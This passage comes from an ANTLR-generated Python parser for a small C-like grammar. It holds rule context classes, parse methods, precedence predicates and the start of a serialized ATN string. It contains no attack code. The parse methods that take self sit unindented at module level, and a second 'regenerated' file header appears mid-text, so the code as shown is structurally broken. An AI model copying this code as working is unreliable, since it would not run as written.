        self.parser = parser  # owning SmallCParser instance

    def declarator1(self):
        # Nested declarator1 child (parenthesized form).
        return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)

    def declarator2(self):
        return self.getTypedRuleContext(SmallCParser.Declarator2Context,0)

    def arrayPart(self):
        # Optional array suffix; None when absent.
        return self.getTypedRuleContext(SmallCParser.ArrayPartContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_declarator1

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDeclarator1" ):
            listener.enterDeclarator1(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDeclarator1" ):
            listener.exitDeclarator1(self)
def declarator1(self):
    """Parse 'declarator1': either '(' declarator1 ')' or declarator2 with an
    optional arrayPart suffix."""
    localctx = SmallCParser.Declarator1Context(self, self._ctx, self.state)
    self.enterRule(localctx, 74, self.RULE_declarator1)
    try:
        self.state = 477
        self._errHandler.sync(self);
        # Decision 43 selects the alternative.
        la_ = self._interp.adaptivePredict(self._input,43,self._ctx)
        if la_ == 1:
            # Alt 1: '(' declarator1 ')'
            self.enterOuterAlt(localctx, 1)
            self.state = 469
            self.match(SmallCParser.LBRA)
            self.state = 470
            self.declarator1()
            self.state = 471
            self.match(SmallCParser.RBRA)
            pass
        elif la_ == 2:
            # Alt 2: declarator2 arrayPart?
            self.enterOuterAlt(localctx, 2)
            self.state = 473
            self.declarator2()
            self.state = 475
            self._errHandler.sync(self);
            # Decision 42 decides whether an array suffix follows.
            la_ = self._interp.adaptivePredict(self._input,42,self._ctx)
            if la_ == 1:
                self.state = 474
                self.arrayPart()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Declarator2Context(ParserRuleContext):
    """Parse-tree node for the 'declarator2' rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def declarator2(self):
        # Nested declarator2 child (parenthesized form).
        return self.getTypedRuleContext(SmallCParser.Declarator2Context,0)

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def pointerPart(self, i:int=None):
        # i is None -> list of all pointerPart children; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        else:
            return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)

    def declarator1(self):
        return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_declarator2

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterDeclarator2" ):
            listener.enterDeclarator2(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitDeclarator2" ):
            listener.exitDeclarator2(self)
def declarator2(self):
    """Parse 'declarator2': a parenthesized declarator2, a (possibly
    pointer-prefixed) identifier, or one-or-more pointerParts followed by a
    declarator1. T__11 is the pointer token (presumably '*' — TODO confirm
    against SmallC.g4).
    """
    localctx = SmallCParser.Declarator2Context(self, self._ctx, self.state)
    self.enterRule(localctx, 76, self.RULE_declarator2)
    self._la = 0 # Token type
    try:
        self.state = 497
        self._errHandler.sync(self);
        # Decision 46 selects among the three alternatives.
        la_ = self._interp.adaptivePredict(self._input,46,self._ctx)
        if la_ == 1:
            # Alt 1: '(' declarator2 ')'
            self.enterOuterAlt(localctx, 1)
            self.state = 479
            self.match(SmallCParser.LBRA)
            self.state = 480
            self.declarator2()
            self.state = 481
            self.match(SmallCParser.RBRA)
            pass
        elif la_ == 2:
            # Alt 2: pointerPart* identifier
            self.enterOuterAlt(localctx, 2)
            self.state = 486
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==SmallCParser.T__11:
                self.state = 483
                self.pointerPart()
                self.state = 488
                self._errHandler.sync(self)
                _la = self._input.LA(1)
            self.state = 489
            self.identifier()
            pass
        elif la_ == 3:
            # Alt 3: pointerPart+ declarator1 ('+' loop driven by decision 45).
            self.enterOuterAlt(localctx, 3)
            self.state = 491
            self._errHandler.sync(self)
            _alt = 1
            while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
                if _alt == 1:
                    self.state = 490
                    self.pointerPart()
                else:
                    raise NoViableAltException(self)
                self.state = 493
                self._errHandler.sync(self)
                _alt = self._interp.adaptivePredict(self._input,45,self._ctx)
            self.state = 495
            self.declarator1()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class InitializerContext(ParserRuleContext):
    """Parse-tree node for the 'initializer' rule: a braced expression list or
    a single expression."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def LCBRA(self):
        return self.getToken(SmallCParser.LCBRA, 0)

    def RCBRA(self):
        return self.getToken(SmallCParser.RCBRA, 0)

    def expression(self, i:int=None):
        # i is None -> list of all expression children; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
        else:
            return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_initializer

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterInitializer" ):
            listener.enterInitializer(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitInitializer" ):
            listener.exitInitializer(self)
def initializer(self):
    """Parse 'initializer': '{' (expression (',' expression)*)? '}' or a bare
    expression, selected on one token of lookahead."""
    localctx = SmallCParser.InitializerContext(self, self._ctx, self.state)
    self.enterRule(localctx, 78, self.RULE_initializer)
    self._la = 0 # Token type
    try:
        self.state = 512
        token = self._input.LA(1)
        if token in [SmallCParser.LCBRA]:
            # Alt 1: braced, possibly empty, comma-separated expression list.
            self.enterOuterAlt(localctx, 1)
            self.state = 499
            self.match(SmallCParser.LCBRA)
            self.state = 508
            _la = self._input.LA(1)
            # Bitset test: does the next token start an expression?
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
                self.state = 500
                self.expression()
                self.state = 505
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                while _la==SmallCParser.COMMA:
                    self.state = 501
                    self.match(SmallCParser.COMMA)
                    self.state = 502
                    self.expression()
                    self.state = 507
                    self._errHandler.sync(self)
                    _la = self._input.LA(1)
            self.state = 510
            self.match(SmallCParser.RCBRA)
        elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
            # Alt 2: a single expression.
            self.enterOuterAlt(localctx, 2)
            self.state = 511
            self.expression()
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ReturnStmtContext(ParserRuleContext):
    """Parse-tree node for the 'returnStmt' rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def RETURN(self):
        return self.getToken(SmallCParser.RETURN, 0)

    def expression(self):
        # Optional return value; None when 'return' had no expression.
        return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_returnStmt

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterReturnStmt" ):
            listener.enterReturnStmt(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitReturnStmt" ):
            listener.exitReturnStmt(self)
def returnStmt(self):
    """Parse 'returnStmt': RETURN followed by an optional expression."""
    localctx = SmallCParser.ReturnStmtContext(self, self._ctx, self.state)
    self.enterRule(localctx, 80, self.RULE_returnStmt)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 514
        self.match(SmallCParser.RETURN)
        self.state = 516
        _la = self._input.LA(1)
        # Bitset test: parse an expression only if the next token can start one.
        if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
            self.state = 515
            self.expression()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ArgumentsContext(ParserRuleContext):
    """Parse-tree node for the 'arguments' rule (call argument list)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def expression(self, i:int=None):
        # i is None -> list of all argument expressions; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
        else:
            return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)

    def getRuleIndex(self):
        return SmallCParser.RULE_arguments

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterArguments" ):
            listener.enterArguments(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitArguments" ):
            listener.exitArguments(self)
def arguments(self):
    """Parse 'arguments': a comma-separated expression list, or empty when the
    next token is RBRA (i.e. an empty call argument list)."""
    localctx = SmallCParser.ArgumentsContext(self, self._ctx, self.state)
    self.enterRule(localctx, 82, self.RULE_arguments)
    self._la = 0 # Token type
    try:
        self.state = 527
        token = self._input.LA(1)
        if token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
            # Alt 1: expression (',' expression)*
            self.enterOuterAlt(localctx, 1)
            self.state = 518
            self.expression()
            self.state = 523
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==SmallCParser.COMMA:
                self.state = 519
                self.match(SmallCParser.COMMA)
                self.state = 520
                self.expression()
                self.state = 525
                self._errHandler.sync(self)
                _la = self._input.LA(1)
        elif token in [SmallCParser.RBRA]:
            # Alt 2: empty argument list (')' follows immediately).
            self.enterOuterAlt(localctx, 2)
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FunctionCallContext(ParserRuleContext):
    """Parse-tree node for the 'functionCall' rule: identifier '(' arguments ')'."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def arguments(self):
        return self.getTypedRuleContext(SmallCParser.ArgumentsContext,0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_functionCall

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterFunctionCall" ):
            listener.enterFunctionCall(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitFunctionCall" ):
            listener.exitFunctionCall(self)
def functionCall(self):
    """Parse 'functionCall': identifier '(' arguments ')'."""
    localctx = SmallCParser.FunctionCallContext(self, self._ctx, self.state)
    self.enterRule(localctx, 84, self.RULE_functionCall)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 529
        self.identifier()
        self.state = 530
        self.match(SmallCParser.LBRA)
        self.state = 531
        self.arguments()
        self.state = 532
        self.match(SmallCParser.RBRA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class VariableContext(ParserRuleContext):
    """Parse-tree node for the 'variable' rule: a bare identifier reference."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def identifier(self):
        """Return the wrapped IdentifierContext child."""
        return self.getTypedRuleContext(SmallCParser.IdentifierContext, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_variable

    def enterRule(self, listener:ParseTreeListener):
        # Notify only listeners that implement the hook.
        enter = getattr(listener, "enterVariable", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitVariable", None)
        if leave is not None:
            leave(self)
def variable(self):
    """Parse the 'variable' rule: a single identifier."""
    localctx = SmallCParser.VariableContext(self, self._ctx, self.state)
    self.enterRule(localctx, 86, self.RULE_variable)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 534
        self.identifier()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IdentifierContext(ParserRuleContext):
    """Parse-tree node for the 'identifier' rule (a single IDENTIFIER token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def IDENTIFIER(self):
        return self.getToken(SmallCParser.IDENTIFIER, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_identifier

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIdentifier" ):
            listener.enterIdentifier(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIdentifier" ):
            listener.exitIdentifier(self)
def identifier(self):
    """Parse the 'identifier' rule: match one IDENTIFIER token."""
    localctx = SmallCParser.IdentifierContext(self, self._ctx, self.state)
    self.enterRule(localctx, 88, self.RULE_identifier)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 536
        self.match(SmallCParser.IDENTIFIER)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class PointerContext(ParserRuleContext):
    """Parse-tree node for the 'pointer' rule (matches the T__11 literal token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def getRuleIndex(self):
        return SmallCParser.RULE_pointer

    def enterRule(self, listener:ParseTreeListener):
        # Notify only listeners that implement the hook.
        enter = getattr(listener, "enterPointer", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitPointer", None)
        if leave is not None:
            leave(self)
def pointer(self):
    """Parse the 'pointer' rule: match the T__11 literal
    (presumably '*' — TODO confirm against SmallC.g4)."""
    localctx = SmallCParser.PointerContext(self, self._ctx, self.state)
    self.enterRule(localctx, 90, self.RULE_pointer)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 538
        self.match(SmallCParser.T__11)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class TypeDeclarationContext(ParserRuleContext):
    """Parse-tree node for the 'typeDeclaration' rule (one of the type keywords)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def TYPECHAR(self):
        return self.getToken(SmallCParser.TYPECHAR, 0)

    def TYPEFLOAT(self):
        return self.getToken(SmallCParser.TYPEFLOAT, 0)

    def TYPEINT(self):
        return self.getToken(SmallCParser.TYPEINT, 0)

    def TYPEVOID(self):
        return self.getToken(SmallCParser.TYPEVOID, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_typeDeclaration

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterTypeDeclaration" ):
            listener.enterTypeDeclaration(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitTypeDeclaration" ):
            listener.exitTypeDeclaration(self)
def typeDeclaration(self):
    """Parse 'typeDeclaration': consume one of TYPECHAR/TYPEFLOAT/TYPEINT/TYPEVOID,
    using a token-set match (bitset) rather than per-alternative branches."""
    localctx = SmallCParser.TypeDeclarationContext(self, self._ctx, self.state)
    self.enterRule(localctx, 92, self.RULE_typeDeclaration)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 540
        _la = self._input.LA(1)
        if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID))) != 0)):
            # Next token is not in the set: let the error handler repair inline.
            self._errHandler.recoverInline(self)
        else:
            self.consume()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FloatLiteralContext(ParserRuleContext):
    """Parse-tree node for the 'floatLiteral' rule (a single FLOAT token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def FLOAT(self):
        return self.getToken(SmallCParser.FLOAT, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_floatLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterFloatLiteral" ):
            listener.enterFloatLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitFloatLiteral" ):
            listener.exitFloatLiteral(self)
def floatLiteral(self):
    """Parse the 'floatLiteral' rule: match one FLOAT token."""
    localctx = SmallCParser.FloatLiteralContext(self, self._ctx, self.state)
    self.enterRule(localctx, 94, self.RULE_floatLiteral)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 542
        self.match(SmallCParser.FLOAT)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IntegerLiteralContext(ParserRuleContext):
    """Parse-tree node for the 'integerLiteral' rule (a single INTEGER token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def INTEGER(self):
        return self.getToken(SmallCParser.INTEGER, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_integerLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIntegerLiteral" ):
            listener.enterIntegerLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIntegerLiteral" ):
            listener.exitIntegerLiteral(self)
def integerLiteral(self):
    """Parse the 'integerLiteral' rule: match one INTEGER token."""
    localctx = SmallCParser.IntegerLiteralContext(self, self._ctx, self.state)
    self.enterRule(localctx, 96, self.RULE_integerLiteral)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 544
        self.match(SmallCParser.INTEGER)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class CharacterLiteralContext(ParserRuleContext):
    """Parse-tree node for the 'characterLiteral' rule (a single CHARACTER token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def CHARACTER(self):
        return self.getToken(SmallCParser.CHARACTER, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_characterLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterCharacterLiteral" ):
            listener.enterCharacterLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitCharacterLiteral" ):
            listener.exitCharacterLiteral(self)
def characterLiteral(self):
    """Parse the 'characterLiteral' rule: match a single CHARACTER token."""
    ctx = SmallCParser.CharacterLiteralContext(self, self._ctx, self.state)
    self.enterRule(ctx, 98, self.RULE_characterLiteral)
    try:
        self.enterOuterAlt(ctx, 1)
        self.state = 546
        self.match(SmallCParser.CHARACTER)
    except RecognitionException as err:
        # Record the failure on the context, then report and resynchronize.
        ctx.exception = err
        self._errHandler.reportError(self, err)
        self._errHandler.recover(self, err)
    finally:
        self.exitRule()
    return ctx
class StringLiteralContext(ParserRuleContext):
    """Parse-tree node for the 'stringLiteral' rule (a single STRING token)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser  # owning SmallCParser instance

    def STRING(self):
        return self.getToken(SmallCParser.STRING, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_stringLiteral

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterStringLiteral" ):
            listener.enterStringLiteral(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitStringLiteral" ):
            listener.exitStringLiteral(self)
def stringLiteral(self):
    """Parse the 'stringLiteral' rule: match a single STRING token."""
    ctx = SmallCParser.StringLiteralContext(self, self._ctx, self.state)
    self.enterRule(ctx, 100, self.RULE_stringLiteral)
    try:
        self.enterOuterAlt(ctx, 1)
        self.state = 548
        self.match(SmallCParser.STRING)
    except RecognitionException as err:
        # Record the failure on the context, then report and resynchronize.
        ctx.exception = err
        self._errHandler.reportError(self, err)
        self._errHandler.recover(self, err)
    finally:
        self.exitRule()
    return ctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
    """Dispatch a semantic/precedence predicate to the per-rule handler.

    The ANTLR runtime calls this with the rule index of a left-recursive rule;
    the handler table is built lazily on first use.

    Raises:
        Exception: if no predicate handler exists for ``ruleIndex``.
    """
    # Fix: compare to the None singleton with `is`, not `==` (PEP 8; `==` can
    # be hijacked by a custom __eq__ and is slower).
    if self._predicates is None:
        self._predicates = dict()
        self._predicates[3] = self.oplevel12_sempred
        self._predicates[4] = self.oplevel11_sempred
        self._predicates[8] = self.oplevel7_sempred
        self._predicates[9] = self.oplevel6_sempred
        self._predicates[11] = self.oplevel4_sempred
        self._predicates[12] = self.oplevel3_sempred
        self._predicates[14] = self.oplevel1_sempred
    pred = self._predicates.get(ruleIndex, None)
    if pred is None:
        raise Exception("No predicate with index:" + str(ruleIndex))
    else:
        return pred(localctx, predIndex)
def oplevel12_sempred(self, localctx:Oplevel12Context, predIndex:int):
    # Precedence predicate for left-recursive 'oplevel12'.
    # Returns None (falsy) for unrecognized predicate indices.
    if predIndex == 0:
        return self.precpred(self._ctx, 2)
def oplevel11_sempred(self, localctx:Oplevel11Context, predIndex:int):
    # Precedence predicate for left-recursive 'oplevel11'.
    if predIndex == 1:
        return self.precpred(self._ctx, 2)
def oplevel7_sempred(self, localctx:Oplevel7Context, predIndex:int):
    # Precedence predicates for left-recursive 'oplevel7' (two operators).
    if predIndex == 2:
        return self.precpred(self._ctx, 3)
    if predIndex == 3:
        return self.precpred(self._ctx, 2)
def oplevel6_sempred(self, localctx:Oplevel6Context, predIndex:int):
    # Precedence predicates for left-recursive 'oplevel6' (four operators).
    if predIndex == 4:
        return self.precpred(self._ctx, 5)
    if predIndex == 5:
        return self.precpred(self._ctx, 4)
    if predIndex == 6:
        return self.precpred(self._ctx, 3)
    if predIndex == 7:
        return self.precpred(self._ctx, 2)
def oplevel4_sempred(self, localctx:Oplevel4Context, predIndex:int):
    # Precedence predicates for left-recursive 'oplevel4' (two operators).
    if predIndex == 8:
        return self.precpred(self._ctx, 3)
    if predIndex == 9:
        return self.precpred(self._ctx, 2)
def oplevel3_sempred(self, localctx:Oplevel3Context, predIndex:int):
    # Precedence predicates for left-recursive 'oplevel3' (three operators).
    if predIndex == 10:
        return self.precpred(self._ctx, 4)
    if predIndex == 11:
        return self.precpred(self._ctx, 3)
    if predIndex == 12:
        return self.precpred(self._ctx, 2)
def oplevel1_sempred(self, localctx:Oplevel1Context, predIndex:int):
    # Precedence predicates for left-recursive 'oplevel1'.
    # NOTE(review): only indices 13-15 are handled here; if the grammar's
    # decision 1 emits higher predicate indices they fall through to None.
    if predIndex == 13:
        return self.precpred(self._ctx, 9)
    if predIndex == 14:
        return self.precpred(self._ctx, 8)
    if predIndex == 15:
        return self.precpred(self._ctx, 7)
# regenerated SmallCParser.py after atom changed it
# Generated from SmallC.g4 by ANTLR 4.5.3
# encoding: utf-8
from antlr4 import *
from io import StringIO
def serializedATN():
    """Return the serialized ATN (augmented transition network) for the
    SmallC grammar as a single string.

    The escaped string fragments below are emitted verbatim by the ANTLR
    tool and are deserialized once at class-load time by
    ``ATNDeserializer``.  Do not edit this data by hand; regenerate it
    from ``SmallC.g4`` instead.
    """
    with StringIO() as buf:
        buf.write("\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\38")
        buf.write("\u0229\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
        buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
        buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
        buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
        buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
        buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
        buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
        buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
        buf.write("\3\2\3\2\3\3\3\3\3\3\3\3\3\3\5\3p\n\3\3\4\3\4\3\4\3\4")
        buf.write("\3\4\3\4\3\4\5\4y\n\4\3\5\3\5\3\5\3\5\3\5\3\5\7\5\u0081")
        buf.write("\n\5\f\5\16\5\u0084\13\5\3\6\3\6\3\6\3\6\3\6\3\6\7\6\u008c")
        buf.write("\n\6\f\6\16\6\u008f\13\6\3\7\3\7\3\b\3\b\3\t\3\t\3\n\3")
        buf.write("\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\7\n\u00a0\n\n\f\n\16\n")
        buf.write("\u00a3\13\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3")
        buf.write("\13\3\13\3\13\3\13\3\13\3\13\3\13\7\13\u00b4\n\13\f\13")
        buf.write("\16\13\u00b7\13\13\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r")
        buf.write("\3\r\3\r\7\r\u00c4\n\r\f\r\16\r\u00c7\13\r\3\16\3\16\3")
        buf.write("\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\7\16")
        buf.write("\u00d5\n\16\f\16\16\16\u00d8\13\16\3\17\3\17\3\17\3\17")
        buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
        buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\5\17\u00ef\n\17\3\20\3")
        buf.write("\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\5\20\u00fb")
        buf.write("\n\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\7\20")
        buf.write("\u0106\n\20\f\20\16\20\u0109\13\20\3\21\3\21\3\21\3\21")
        buf.write("\3\21\3\21\7\21\u0111\n\21\f\21\16\21\u0114\13\21\3\22")
        buf.write("\3\22\3\22\3\22\3\22\3\22\3\22\5\22\u011d\n\22\3\23\3")
        buf.write("\23\3\23\3\23\3\24\3\24\3\25\6\25\u0126\n\25\r\25\16\25")
        buf.write("\u0127\3\25\7\25\u012b\n\25\f\25\16\25\u012e\13\25\3\25")
        buf.write("\3\25\3\25\3\25\3\25\3\25\3\26\6\26\u0137\n\26\r\26\16")
        buf.write("\26\u0138\3\26\7\26\u013c\n\26\f\26\16\26\u013f\13\26")
        buf.write("\3\26\3\26\3\26\3\26\3\26\3\26\3\27\3\27\3\27\3\27\7\27")
        buf.write("\u014b\n\27\f\27\16\27\u014e\13\27\3\27\5\27\u0151\n\27")
        buf.write("\3\30\6\30\u0154\n\30\r\30\16\30\u0155\3\30\7\30\u0159")
        buf.write("\n\30\f\30\16\30\u015c\13\30\3\30\5\30\u015f\n\30\3\30")
        buf.write("\5\30\u0162\n\30\3\31\3\31\5\31\u0166\n\31\3\32\3\32\5")
        buf.write("\32\u016a\n\32\3\32\3\32\3\33\3\33\7\33\u0170\n\33\f\33")
        buf.write("\16\33\u0173\13\33\3\33\3\33\3\34\3\34\3\34\3\34\3\34")
        buf.write("\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\5\34")
